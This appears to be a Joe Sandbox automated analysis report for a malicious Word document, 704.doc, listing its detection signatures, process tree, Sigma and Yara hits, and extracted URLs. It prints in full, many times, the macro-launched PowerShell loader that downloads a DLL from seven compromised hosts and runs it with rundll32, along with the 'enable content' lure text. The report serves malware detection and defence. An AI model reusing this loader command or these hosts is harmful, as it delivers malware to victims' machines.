Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 704.doc

Overview

General Information

Sample Name:704.doc
Analysis ID:526268
MD5:40f85d07da2533d576b1f2d7c043a2da
SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1220 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2420 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2776 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0xafc8:$s1: \Common Files\Microsoft Shared\
  • 0xb320:$s1: \Common Files\Microsoft Shared\
  • 0x4447:$s2: Scripting.FileSystemObject
  • 0x557e:$a1: Document_Open
  • 0xa5e7:$a1: Document_Open
  • 0xb9f6:$a1: Document_Open
  • 0xd114:$a1: Document_Open

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2420
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2420
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2420, ProcessCommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebReques

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://ckfoods.net/wp-admin/wPInm2rgMu/Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/Avira URL Cloud: Label: malware
Machine Learning detection for sampleShow sources
Source: 704.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpString found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmpJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA with functions possibly related to ADO stream file operationsShow sources
Source: ~DF59F33552EDE7EF7C.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)Name: fjow3efyw98efhasdokfhlnkvawofh3
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 704.docOLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 704.docOLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator application name: unknown
Source: 704.docOLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentationOLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_OpenName: Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 704.docOLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........n.....................................`I.........v.....................K......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............:T.k......T...............7.............}..v............0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............ZU.k....@.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
